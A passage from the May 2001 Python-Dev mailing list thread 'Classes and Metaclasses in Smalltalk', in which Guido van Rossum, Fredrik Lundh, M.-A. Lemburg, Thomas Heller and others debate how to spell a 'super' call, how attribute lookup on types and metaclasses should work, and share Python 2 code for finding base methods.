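def super_would_be_magic(source, funcname):
    """True if `super` is used in funcname but never visibly assigned."""
    top = symtable.symtable(source, "<sketch>", "exec")
    func = _find_function(top, funcname)
    if func is None or "super" not in func.get_identifiers():
        return False
    sym = func.lookup("super")
    if sym.is_assigned() or sym.is_parameter():
        return False   # bound locally: an ordinary variable
    # A module-level assignment also turns it back into a plain name.
    return not ("super" in top.get_identifiers()
                and top.lookup("super").is_assigned())
```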

Jeremy


From fredrik@pythonware.com  Wed May  2 15:00:55 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Wed, 2 May 2001 16:00:55 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <000d01c0d310$4ee127d0$0900a8c0@spiff>

guido wrote:

> > class MyClass (BaseClass):
> >     def foo (self, arg1, arg2):
> >          super.foo(arg1, arg2)
>
> I'm sure that's everybody's favorite way to spell it!

not mine.  my brain contains far too much Python 1.5.2 code
for it to accept that some variables are dynamically scoped,
while others are lexically scoped.

why not spell it out:

    self.__super__.foo(arg1, arg2)

or

    self.super.foo(arg1, arg2)

or

    super(self).foo(arg1, arg2)

> Or, to relieve the burden from the symbol table, we could make super
> a keyword, at the cost of breaking existing code.

hey, how about introducing $ as a keyword prefix for newly introduced
keywords?

    $super.foo(arg1, arg2)

(this can of course be mapped to either of my previous suggestions;
"$foo" either means "self.foo" or "foo(self)"...)

and to save a little typing, only use it for keywords that start with
an "s" (should leave us plenty of expansion room):

    $uper.foo(arg1, arg2)

otoh, if "super" is common enough to motivate introducing magic objects
into python, maybe "$" should mean "super."?

    $foo(arg1, arg2)

and while we're at it, let's introduce "@" for "self.".

gotta run -- time for my monthly reboot /F


From guido@digicool.com  Wed May  2 16:03:37 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:03:37 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 11:09:17 +0200."
 <3AEFCEBD.2E5979C9@lemburg.com>
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
 <3AEFCEBD.2E5979C9@lemburg.com>
Message-ID: <200105021503.KAA32203@cj20424-a.reston1.va.home.com>

[me]
> > The best rule I can think of so far is that DictType.__dict__ gives
> > the *true* set of attribute descriptors for dictionary objects, and is
> > thus similar to Smalltalk's class.methodDict that Jim describes
> > below.  DictType.foo is a shortcut that can resolve to either
> > DictType.__dict__['foo'] or to an attribute (maybe a method) of
> > DictType described in TypeType.__dict__['foo'], whichever is defined.
> > If both are defined, I propose the following, clumsy but backwards
> > compatible rule: if DictType.__dict__['foo'] describes a method, it
> > wins.  Otherwise, TypeType.__dict__['foo'] wins.

[MAL]
> I'm not sure I can follow you here: DictType.__repr__ is the
> representation method of the dictionary and not inherited
> from TypeType, so there should be no problem.

The problem is that both a dictionary object (call it d) and its type
(DictType) have a __repr__ method: repr(d) returns "d", and
repr(DictType) returns "<type 'dictionary'>".

Given the analogy with classes, where str(x) invokes x.__str__() and
x.__str__() can also be called directly, it is not unreasonable to
expect that this works in general, so that repr(d) can be spelled as

    d.__repr__()

and repr(DictType) as

    DictType.__repr__()

And, given another analogy with classes, where x.foo() is equivalent
to x.__class__.foo(x), the two forms above should also be equivalent
to

    d.__class__.__repr__(d)

and

    DictType.__class__.__repr__(DictType)

But since d.__class__ is DictType, we now have two conflicting ways to
derive a meaning for DictType.__repr__: the first one going

    repr(DictType) => DictType.__repr__()

and the second one going

    repr(d) => d.__class__.__repr__(d) => DictType.__repr__(d)

The rule quoted above chooses the second meaning, from the very
pragmatic point that once I allow subclassing from DictType, such a
subclass might very well want to override __repr__ to wrap the base
class __repr__, and the conventional way to reference that (barring
the implementation of 'super') is DictType.__repr__.  Direct
invocation of an object's own __repr__ method as x.__repr__() is much
less common.  The implementation of repr(x) can do the right thing,
which is to look for x.__class__.__dict__['__repr__'].
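In modern Python 3 the rule sketched here is roughly what the interpreter does: repr(x) looks __repr__ up on type(x), so the class attribute can name the instance method while repr() of the class itself goes through the metaclass. A minimal check, assuming a current CPython 3 interpreter (not the 2.1-era code under discussion) and using the built-in dict in place of DictType:

```python
# Python 3 sketch: implicit special-method lookup goes through the type,
# so the instance method and the metaclass method never collide.
d = {"a": 1}

# repr(d) is the __repr__ found in d's class dictionary, applied to d.
assert repr(d) == type(d).__dict__["__repr__"](d) == "{'a': 1}"

# Attribute access on the class itself finds the instance method first ...
assert dict.__repr__ is dict.__dict__["__repr__"]

# ... while repr(dict) uses the metaclass's __repr__ (type.__repr__).
assert repr(dict) == type(dict).__repr__(dict) == "<class 'dict'>"
```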

> The problem with the misleading error message would only show
> up in case DictType does not define a __repr__ method. Then the
> inherited one from TypeType would come into play and cause
> the problem you mention above.

No, the issue is not inheritance: I haven't implemented inheritance
yet.  DictType is an instance of TypeType but doesn't inherit from it.

> Thinking in terms of meta-classes, I believe we should implement
> this mechanism in the meta-class (TypeType in this case). Its
> __getattr__() will have to decide whether or not to expose its
> own methods and attributes.

That's exactly how I solved it: type_getattro() implements the rule
quoted at the top.

> The only catch here is that currently instances and classes have
> control of whether and how to bind found functions as methods or not.
> We should  probably change that to pass complete control over to the
> meta-class object and remove the special control flows currently found
> in instance_getattr2() and class_lookup().

Um, yeah, that's where I think this will end up causing more trouble.

Right now, if x is an instance, some attributes like x.__class__ and
x.__dict__ are special-cased in instance_getattr().  The mechanism I
propose removes the need for (most of) such special cases, and instead
allows the class to provide "descriptors" for instance attributes.
So, for example, if instances of a class C have an attribute named
foo, C.__dict__['foo'] contains the descriptor for that attribute, and
that is how the implementation decides how to interpret x.foo
(assuming x is an instance of C).  We may be able to access this same
descriptor as C.foo, but that's really only important for backwards
compatibility with the way classes work today.
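The descriptor idea can be sketched in today's Python 3, which has descriptors in this spirit. In this minimal sketch the class name Described and its storage scheme are hypothetical; C.__dict__['foo'] holds the descriptor object, and x.foo is computed by calling its __get__ method:

```python
class Described:
    """Hypothetical data descriptor that keeps each instance's value in
    the instance __dict__ under a private key."""

    def __init__(self, name):
        self.key = "_" + name

    def __get__(self, obj, owner=None):
        if obj is None:          # accessed on the class, e.g. C.foo
            return self
        return obj.__dict__.get(self.key, 0)   # 0 if never assigned

    def __set__(self, obj, value):
        obj.__dict__[self.key] = value


class C:
    foo = Described("foo")   # C.__dict__['foo'] is the descriptor


x = C()
x.foo = 42                   # routed through Described.__set__
assert x.foo == 42           # routed through Described.__get__
assert x.__dict__ == {"_foo": 42}
assert C.foo is C.__dict__["foo"]
```

Because Described defines __set__, it takes priority over the instance dictionary, which is what lets the class rather than the instance decide how x.foo is interpreted.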

> In general, I think that meta-classes should not expose their
> attributes to the class objects they create, since this causes
> way too many problems.

I agree.

> Perhaps I'm oversimplifying things here, but I have a feeling that
> we can go a long way by actually trying to see meta-classes as
> first class members in the interpreter design and moving all the
> binding and lookup mechanisms over to this object type. The special
> casing should then take place in the meta-class rather than its
> creations.

Yes, that's where I'm heading!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Wed May  2 15:02:41 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:02:41 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
 <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
Message-ID: <3AF01381.592AE31B@lemburg.com>

Guido van Rossum wrote:
> 
> > This doesn't work in Python since Python has multiple inheritance,
> > e.g. super in
> >
> > class A(B,C):
> >       def foo(self):
> >               super.foo()
> >
> > is ambiguous.
> 
> I'm not sure what you mean.  The search is totally well-defined: first
> search B for a foo method, then search C.

I thought you were talking about an abstract super class which is
how Java uses this term. 

Rereading some of the posts, I think you are indeed referring to
the method which foo overrides -- this is what I call basemethod
(since it is implemented in one of the base classes).
 
> > I'd rather suggest adding a function for finding the basemethod
> > of a method. This is probably the most common task in this context.
> 
> I've never heard of the concept of basemethod, but if I may venture a
> guess, it would be the same definition as I give above.

The basemethod can be defined as the first method of the same name
found in the inheritance tree using the standard Python lookup
strategy (left-right, depth first) when continuing the lookup search
at the node in the inheritance tree which defines the method querying
the basemethod.

In other words: you let Python continue the search for the method
as if it hadn't found the occurrence calling the basemethod()
API. Hmm, still not clear enough... better let Tim jump in here
(we've had a discussion about basemethod() some months or years
ago). Tim ?

Note that there are many ways of defining what a basemethod
is, due to the ambiguities that are caused by multiple inheritance
(e.g. the same base class may appear in different branches of the
inheritance tree).
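The definition above can be made concrete with a small Python 3 sketch. The helper names classic_order and next_method are hypothetical; classic_order mimics the left-to-right, depth-first search of classic classes, and the diamond at the end shows the ambiguity just mentioned: continuing after B finds A.foo under that search, while Python 3's C3 order (__mro__) finds C.foo.

```python
def classic_order(cls):
    """Depth-first, left-to-right search order of classic classes
    (a base reachable by two paths appears twice)."""
    order = [cls]
    for base in cls.__bases__:
        order.extend(classic_order(base))
    return order


def next_method(cls, defclass, name, order=classic_order):
    """Hypothetical helper: find `name` in the search order of `cls`,
    continuing *after* the class `defclass` that defines the caller."""
    seq = order(cls)
    for c in seq[seq.index(defclass) + 1:]:
        if name in c.__dict__:
            return c.__dict__[name]
    raise AttributeError(name)


# Illustrative (hypothetical) diamond: D -> B, C -> A
class A:
    def foo(self): return "A.foo"

class B(A):
    def foo(self): return "B.foo"

class C(A):
    def foo(self): return "C.foo"

class D(B, C):
    pass

# Classic depth-first search: D, B, A, object, C, A, object -> A.foo
assert next_method(D, B, "foo") is A.__dict__["foo"]
# Python 3's C3 order: D, B, C, A, object -> C.foo
assert next_method(D, B, "foo", order=lambda k: list(k.__mro__)) is C.__dict__["foo"]
```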

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Wed May  2 16:05:30 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:05:30 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:00:55 +0200."
 <000d01c0d310$4ee127d0$0900a8c0@spiff>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
 <000d01c0d310$4ee127d0$0900a8c0@spiff>
Message-ID: <200105021505.KAA32231@cj20424-a.reston1.va.home.com>

> guido wrote:
> 
> > > class MyClass (BaseClass):
> > >     def foo (self, arg1, arg2):
> > >          super.foo(arg1, arg2)
> >
> > I'm sure that's everybody's favorite way to spell it!
> 
> not mine.  my brain contains far too much Python 1.5.2 code
> for it to accept that some variables are dynamically scoped,
> while others are lexically scoped.
> 
> why not spell it out:
> 
>     self.__super__.foo(arg1, arg2)
> 
> or
> 
>     self.super.foo(arg1, arg2)
> 
> or
> 
>     super(self).foo(arg1, arg2)
> 
> > Or, to relieve the burden from the symbol table, we could make super
> > a keyword, at the cost of breaking existing code.
> 
> hey, how about introducing $ as a keyword prefix for newly introduced
> keywords?
> 
>     $super.foo(arg1, arg2)
> 
> (this can of course be mapped to either of my previous suggestions;
> "$foo" either means "self.foo" or "foo(self)"...)
> 
> and to save a little typing, only use it for keywords that start with
> an "s" (should leave us plenty of expansion room):
> 
>     $uper.foo(arg1, arg2)
> 
> otoh, if "super" is common enough to motivate introducing magic objects
> into python, maybe "$" should mean "super."?
> 
>     $foo(arg1, arg2)
> 
> and while we're at it, let's introduce "@" for "self.".
> 
> gotta run -- time for my monthly reboot /F

LOL!  But you forgot the spelling of

    self.__super.foo(arg1, arg2)

which would pass in the class name that's the other necessary input to
a proper implementation of super. :-)
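The name-mangling aside can be turned into a working trick in Python 3: inside the body of class C, self.__super is compiled as self._C__super, so a metaclass only has to store a super object under that name. A minimal sketch; the metaclass name autosuper and the classes A to D are illustrative assumptions, not part of any proposal in this thread:

```python
class autosuper(type):
    """Hypothetical metaclass: give each class C an attribute _C__super
    holding super(C), so that self.__super (name-mangled inside the
    body of C to self._C__super) carries C implicitly."""

    def __init__(cls, name, bases, namespace):
        super().__init__(name, bases, namespace)
        # Name mangling strips leading underscores from the class name.
        setattr(cls, "_%s__super" % name.lstrip("_"), super(cls))


# Illustrative (hypothetical) classes
class A(metaclass=autosuper):
    def meth(self):
        return "A"

class B(A):
    def meth(self):
        return "B" + self.__super.meth()

class C(A):
    def meth(self):
        return "C" + self.__super.meth()

class D(C, B):
    def meth(self):
        return "D" + self.__super.meth()

assert D().meth() == "DCBA"
```

The stored super(C) object is a descriptor, so fetching it through an instance binds it, yielding super(C, self).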

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Wed May  2 15:04:29 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:04:29 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
 <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
Message-ID: <3AF013ED.8A190FE2@lemburg.com>

Here's an implementation of what I currently use to track down
the basemethod (taken from mx.Tools):

import sys, types
_basemethod_cache = {}

def basemethod(object,method=None,
               cache=_basemethod_cache,InstanceType=types.InstanceType,
               ClassType=types.ClassType,None=None):

    """ Return the unbound method that is defined *after* method in the
        inheritance order of object with the same name as method
        (usually called base method or overridden method).

        object can be an instance, class or bound method. method, if
        given, may be a bound or unbound method. If it is not given,
        object must be a bound method.

        Note: Unbound methods must be called with an instance as first
        argument.

        The function uses a cache to speed up processing. Changes done
        to the class structure after the first hit will not be noticed
        by the function.

        XXX Rewrite in C to increase performance.

    """
    if method is None:
        method = object
        object = method.im_self
    defclass = method.im_class
    name = method.__name__
    if type(object) is InstanceType:
        objclass = object.__class__
    elif type(object) is ClassType:
        objclass = object
    else:
        objclass = object.im_class

    # Check cache
    cacheentry = (defclass, name)
    basemethod = cache.get(cacheentry, None)
    if basemethod is not None:
        if not issubclass(objclass, basemethod.im_class):
            if __debug__:
                sys.stderr.write(
                    'basemethod(%s, %s): cached version (%s) mismatch: '
                    '%s !-> %s\n' %
                    (object, method, basemethod,
                     objclass, basemethod.im_class))
        else:
            return basemethod

    # Find defining class
    path = [objclass]
    while 1:
        if not path:
            raise AttributeError,method
        c = path[0]
        del path[0]
        if c.__bases__:
            # Prepend bases of the class
            path[0:0] = list(c.__bases__)
        if c is defclass:
            # Found (first occurrence of) defining class in inheritance
            # graph
            break
        
    # Scan rest of path for the next occurrence of a method with the
    # same name
    while 1:
        if not path:
            raise AttributeError,name
        c = path[0]
        basemethod = getattr(c, name, None)
        if basemethod is not None:
            # Found; store in cache and return
            cache[cacheentry] = basemethod
            return basemethod
        del path[0]
    raise AttributeError,'method %s' % name
    
-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller@ion-tof.com  Wed May  2 15:06:39 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 16:06:39 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff>
Message-ID: <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook>

/F:
> guido wrote:
> 
> > > class MyClass (BaseClass):
> > >     def foo (self, arg1, arg2):
> > >          super.foo(arg1, arg2)
> >
> > I'm sure that's everybody's favorite way to spell it!
> 
> not mine.  my brain contains far too much Python 1.5.2 code
> for it to accept that some variables are dynamically scoped,
> while others are lexically scoped.
> 
> why not spell it out:
> 
>     self.__super__.foo(arg1, arg2)
> 
> or
> 
>     self.super.foo(arg1, arg2)
> 
> or
> 
>     super(self).foo(arg1, arg2)

IMO we still need to specify the class, and there we are:

     super(self, MyClass).foo(arg1, arg2)

Thomas


From guido@digicool.com  Wed May  2 16:11:17 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:11:17 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:02:41 +0200."
 <3AF01381.592AE31B@lemburg.com>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
 <3AF01381.592AE31B@lemburg.com>
Message-ID: <200105021511.KAA32271@cj20424-a.reston1.va.home.com>

> Guido van Rossum wrote:
> > 
> > > This doesn't work in Python since Python has multiple inheritance,
> > > e.g. super in
> > >
> > > class A(B,C):
> > >       def foo(self):
> > >               super.foo()
> > >
> > > is ambiguous.
> > 
> > I'm not sure what you mean.  The search is totally well-defined: first
> > search B for a foo method, then search C.
> 
> I thought you were talking about an abstract super class which is
> how Java uses this term. 

Ah.  I didn't realize.  This would suggest that another (not yet
mentioned) suggestion would be to spell the basemethod call as

    super.foo(self)

keeping more in line with the tradition of passing self explicitly
when calling basemethods.

> Rereading some of the posts, I think you are indeed referring to
> the method which foo overrides -- this is what I call basemethod
> (since it is implemented in one of the base classes).

Aha.

> > > I'd rather suggest adding a function for finding the basemethod
> > > of a method. This is probably the most common task in this context.
> > 
> > I've never heard of the concept of basemethod, but if I may venture a
> > guess, it would be the same definition as I give above.
> 
> The basemethod can be defined as the first method of the same name
> found in the inheritance tree using the standard Python lookup
> strategy (left-right, depth first) when continuing the lookup search
> at the node in the inheritance tree which defines the method querying
> the basemethod.

Yes, that's what I guessed.

> In other words: you let Python continue the search for the method
> as if it hadn't found the occurrence calling the basemethod()
> API. Hmm, still not clear enough... better let Tim jump in here
> (we've had a discussion about basemethod() some months or years
> ago). Tim ?
> 
> Note that there are many ways of defining what a basemethod
> is, due to the ambiguities that are caused by multiple inheritance
> (e.g. the same base class may appear in different branches of the
> inheritance tree).

Well, the search will find one definite method, but you're right that
there may be situations where it's necessary to specify the specific
base class!

In C++ that is solved by writing B::foo() or C::foo().  Python doesn't
have "::" and instead overloads the "." operator.  Hmm, so even
introducing super doesn't completely remove the need to be able to
write C.foo to reference the unbound method foo of class C, and this
may require that my ugly rule still be needed.

AFAIK, Smalltalk has only single inheritance, and so does Java, so
there 'super' is enough.  Will we need to add a "::" operator to
Python???
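Python's spelling of C++'s B::foo() is the class-qualified call B.foo(self), which Python 3 still supports alongside super(). A minimal sketch with illustrative classes:

```python
# Illustrative (hypothetical) classes
class B:
    def foo(self):
        return "B.foo"

class C:
    def foo(self):
        return "C.foo"

class A(B, C):
    def foo(self):
        # Class-qualified calls name a specific base, like B::foo() in C++;
        # super() instead takes the next class in A's MRO, which is B here.
        return (B.foo(self), C.foo(self), super().foo())

assert A().foo() == ("B.foo", "C.foo", "B.foo")
```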

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Wed May  2 16:19:07 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:19:07 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:04:29 +0200."
 <3AF013ED.8A190FE2@lemburg.com>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
 <3AF013ED.8A190FE2@lemburg.com>
Message-ID: <200105021519.KAA32312@cj20424-a.reston1.va.home.com>

> Here's an implementation of what I currently use to track down
> the basemethod (taken from mx.Tools):

How am I supposed to use this?

I tried this:

    class B:
        def foo(self):
            print "B.foo"

    class C(B):
        def foo(self):
            print "C.foo"
            B.foo(self)
            print basemethod(self.foo) # Expect this to be B.foo

    class D(C):
        def foo(self):
            print "D.foo"
            C.foo(self)

    d = D()
    d.foo()

but the call to basemethod(self.foo) in C prints C.foo, not B.foo as
required.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Wed May  2 16:23:33 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:23:33 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 14:48:20 +1200."
 <200105020248.OAA16329@s454.cosc.canterbury.ac.nz>
References: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz>
Message-ID: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>

> > Except that sometimes you really do want x.__class__.__classdict__ to
> > have priority (e.g. for "guarded" attributes).
> 
> What's a "guarded" attribute?

I meant an attribute that's implemented by a pair of get and set
functions.  This is very useful; my proposed design lets you define
this more directly rather than requiring you to override __getattr__
and __setattr__.
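A guarded attribute in this sense is what Python 3's built-in property provides: a get function and a set function attached to one attribute name. A minimal sketch; the class Account and its validation rule are hypothetical:

```python
class Account:
    """Illustrative (hypothetical) class with one guarded attribute."""

    def __init__(self):
        self._balance = 0

    def _get_balance(self):
        return self._balance

    def _set_balance(self, value):
        if value < 0:
            raise ValueError("balance cannot be negative")
        self._balance = value

    # Reads and writes of acct.balance go through the two functions above;
    # no class-wide __getattr__/__setattr__ override is needed.
    balance = property(_get_balance, _set_balance)


acct = Account()
acct.balance = 10
assert acct.balance == 10
```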

> > But the issue of backwards compatibility is a big one here
> 
> I was thinking that, while this is still in the __future__,
> the __dict__ attribute would be a pseudo-dict that, by
> default, behaves like the union of the old __dict__ and
> the __classdict__.

Actually, I think that what's in the __dict__ is just perfect; it's
the definition of getattr(classobject, name) where name is both an
instance and a class method that causes trouble.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Wed May  2 15:29:20 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:29:20 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
 <3AF013ED.8A190FE2@lemburg.com> <200105021519.KAA32312@cj20424-a.reston1.va.home.com>
Message-ID: <3AF019C0.716E6D35@lemburg.com>

Guido van Rossum wrote:
> 
> > Here's an implementation of what I currently use to track down
> > the basemethod (taken from mx.Tools):
> 
> How am I supposed to use this?
> 
> I tried this:
> 
>     class B:
>         def foo(self):
>             print "B.foo"
> 
>     class C(B):
>         def foo(self):
>             print "C.foo"
>             B.foo(self)
>             print basemethod(self.foo) # Expect this to be B.foo

This finds the basemethod of self.foo, meaning the method overridden
by D.foo. To get at the basemethod of C.foo, you'd have to call

basemethod(self, C.foo)

Note that the intent here is to be able to call basemethods
even in case the defining class is only a mixin class -- a very
common situation at least in many of my applications (keeps
inheritance trees shallow and increases readability of the code).
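For single inheritance, Python 3's two-argument super(C, self) plays roughly the role described for basemethod(self, C.foo): the search continues after C in the MRO of self's class, however deep that class is. A minimal sketch reusing the class names from Guido's test, with return values instead of print statements:

```python
# Illustrative classes modeled on the test above
class B:
    def foo(self):
        return "B.foo"

class C(B):
    def foo(self):
        # Continue the lookup after C in type(self).__mro__
        # (for a D instance: D, C, B, object).
        return "C.foo -> " + super(C, self).foo()

class D(C):
    def foo(self):
        return "D.foo -> " + super(D, self).foo()

assert D().foo() == "D.foo -> C.foo -> B.foo"
# The method overridden by D.foo is C.foo.
assert super(D, D()).foo.__func__ is C.foo
```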
 
>     class D(C):
>         def foo(self):
>             print "D.foo"
>             C.foo(self)
> 
>     d = D()
>     d.foo()
> 
> but the call to basemethod(self.foo) in C prints C.foo, not B.foo as
> required.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik@effbot.org  Wed May  2 15:15:58 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Wed, 2 May 2001 16:15:58 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook>
Message-ID: <002c01c0d312$6a195110$e46940d5@hagrid>

thomas wrote:

> > why not spell it out:
> > 
> >     self.__super__.foo(arg1, arg2)
> > 
> > or
> > 
> >     self.super.foo(arg1, arg2)
> > 
> > or
> > 
> >     super(self).foo(arg1, arg2)
>
> IMO we still need to specify the class, and there we are:
> 
>      super(self, MyClass).foo(arg1, arg2)

isn't that the same as self.__class__ ?  in which case
super is something like:

import new

class super:
    def __init__(self, instance):
        self.instance = instance
    def __getattr__(self, name):
        for klass in self.instance.__class__.__bases__:
            member = getattr(klass, name, None)
            if member:
                if callable(member):
                    return new.instancemethod(member, self.instance, klass)
                return member
        raise AttributeError(name)

(I'm even more confused than my pythonware.com colleague)

Cheers /F


From Donald Beaudry <donb@abinitio.com>  Wed May  2 15:41:14 2001
From: Donald Beaudry <donb@abinitio.com> (Donald Beaudry)
Date: Wed, 02 May 2001 10:41:14 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <200105021441.KAA08444@localhost.localdomain>

Guido van Rossum <guido@digicool.com> wrote,
> [Greg Ward, welcome back!]
> >   * 'super' is a magic object that only makes sense inside a 'def'
> >     inside a 'class' (at least for now; perhaps it could be generalized
> >     to work at class scope as well as method scope, but let's keep
> >     it simple)
> 
> Yes, that's about the only way it can be made to work.  The compiler
> will have to (1) detect that 'super' is a free variable, and (2) make
> it a local and initialize it with the proper magic.  Or, to relieve
> the burden from the symbol table, we could make super a keyword, at
> the cost of breaking existing code.

I'm not at all sure I like the idea of 'super'.  It's far more magic
than I am used to (coming from Python at least).  Currently, we spell
'super' like this:

     class foo(bar):
         def __repr__(self):
             return bar.__repr__(self)  # that's super!

I like the explicit nature of it.  As Guido points out however, this
ends up being ambiguous when we try to make classes more
"instance-like".

Now, how do I like to spell super?

     class foo(bar):
         def __repr__(self):
             return bar._.__repr__(self)  # now that's really super!

or, for those who like the "keyword":

     class foo(bar):
         def __repr__(self):
             super = bar._
             return super.__repr__(self)

The trick here is in the implementation of getattr on '_'.  It returns
a proxy object for the class.  When attributes are accessed through it
a different search path is taken.  This path is the same path that
would be taken by instance attribute look up.  In my code, I refer to
this object as the 'unbound instance'.  Since accessing a function
through this object will yield an unbound instance method, the name
makes sense to me.
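The "unbound instance" can be approximated in Python 3 as a proxy whose attribute lookup walks the class and its bases (the instance search path) and never consults the metaclass. A minimal sketch; the name UnboundInstance is hypothetical, and a fuller version would also need to handle descriptors other than plain functions:

```python
class UnboundInstance:
    """Hypothetical proxy standing in for 'bar._': attribute lookup
    follows the instance search path of `cls` (its __mro__) and returns
    raw class-dict entries, i.e. plain unbound functions."""

    def __init__(self, cls):
        object.__setattr__(self, "_cls", cls)

    def __getattribute__(self, name):
        cls = object.__getattribute__(self, "_cls")
        for klass in cls.__mro__:
            if name in klass.__dict__:
                return klass.__dict__[name]
        raise AttributeError(name)


# Illustrative (hypothetical) classes
class Bar:
    def __repr__(self):
        return "Bar!"

class Foo(Bar):
    def __repr__(self):
        return "Foo/" + UnboundInstance(Bar).__repr__(self)

assert repr(Foo()) == "Foo/Bar!"
# Bar.mro is found on the metaclass (type); the proxy never looks there.
assert callable(Bar.mro)
assert not hasattr(UnboundInstance(Bar), "mro")
```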

--
